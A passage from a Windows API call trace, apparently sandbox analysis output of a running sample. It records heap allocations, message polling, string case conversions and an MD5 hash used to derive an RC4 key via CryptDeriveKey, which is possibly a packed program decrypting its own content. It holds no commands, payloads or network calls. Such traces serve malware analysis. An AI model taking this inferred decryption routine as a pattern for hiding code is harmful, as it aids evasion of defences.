lpsz="A610080612A") returned 0xb [0265.874] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.874] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.874] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.874] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.875] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.875] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0265.875] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.875] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.876] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.876] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.876] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.876] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.876] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.876] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.876] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.877] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.877] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0265.878] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.878] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.878] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.879] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0265.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.879] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.879] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.880] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.880] CryptHashData (hHash=0xaa5860, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0265.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.880] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.880] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.880] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.881] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.881] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.881] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.881] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.881] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: 